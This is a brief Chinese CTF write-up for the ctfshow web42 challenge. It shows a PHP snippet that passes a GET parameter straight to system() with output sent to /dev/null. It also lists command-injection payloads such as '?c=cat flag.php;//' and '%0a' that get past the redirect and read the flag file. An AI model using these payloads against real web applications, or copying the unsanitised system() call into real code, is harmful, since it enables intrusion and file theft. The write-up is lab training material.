C/C++教程
ctfshow-web42(命令执行)
本文主要是介绍ctfshow-web42(命令执行),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
shell重定向
/dev/null 2>&1
让所有的输出流(包括错误的和正确的)都定向到空设备丢弃
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}
要让 /dev/null 2>&1 不能执行
?c=ls;// 或 ?c=ls;%0a ?c=ls;*/ ?c=ls;/*
%26和|| wp上说也可以,但是我、用不了
?c=cat flag.php;//
这篇关于ctfshow-web42(命令执行)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
新能源车企如何通过CRM工具优化客户关系管理,增强客户忠诚度与品牌影响力12-23
-
原创tauri2.1+vite6.0+rust+arco客户端os平台系统|tauri2+rust桌面os管理12-23
-
DevExpress 怎么实现右键菜单(Context Menu)显示中文?-icode9专业技术文章分享12-23
-
怎么通过控制台去看我的页面渲染的内容在哪个文件中呢-icode9专业技术文章分享12-22
-
el-tabs 组件只被引用了一次,但有时会渲染两次是什么原因?-icode9专业技术文章分享12-22
-
wordpress有哪些好的安全插件?-icode9专业技术文章分享12-22
-
wordpress如何查看系统有哪些cron任务?-icode9专业技术文章分享12-22
-
Svg Sprite Icon教程:轻松入门与应用指南12-21
-
Excel数据导出实战:新手必学的简单教程12-20
-
RBAC的权限实战:新手入门教程12-20
-
Svg Sprite Icon实战:从入门到上手的全面指南12-20
-
LCD1602显示模块详解12-20
-
利用Gemini构建处理各种PDF文档的Document AI管道12-20
-
在 uni-app 中怎么实现 WebSocket 的连接、消息发送和接收?-icode9专业技术文章分享12-20
-
indices.breaker.request.limit 默认是多少?-icode9专业技术文章分享12-20
栏目导航
